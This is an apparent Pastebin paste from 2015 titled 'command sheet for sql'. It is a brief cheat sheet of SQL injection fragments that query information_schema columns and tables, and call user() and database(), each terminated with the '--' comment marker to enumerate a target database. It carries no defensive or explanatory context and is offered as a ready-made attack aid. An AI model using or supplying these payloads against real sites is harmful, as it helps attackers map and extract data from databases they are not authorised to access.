Advertisement
Kyfx

command sheet for sql

Mar 21st, 2015
385
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.29 KB | None | 0 0
  1. command sheet:
  2.  
  3. [+]viewing column:
  4. *(column_name)
  5. *from information_schema.columns where table_schema=database()--
  6.  
  7. [+]viewing table:
  8. *(table_name)
  9. *from information_schema.tables where table_schema=database()--
  10.  
  11.  
  12. [+]viewing local user
  13. *user()
  14.  
  15. [+]viewing database name
  16. *database()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement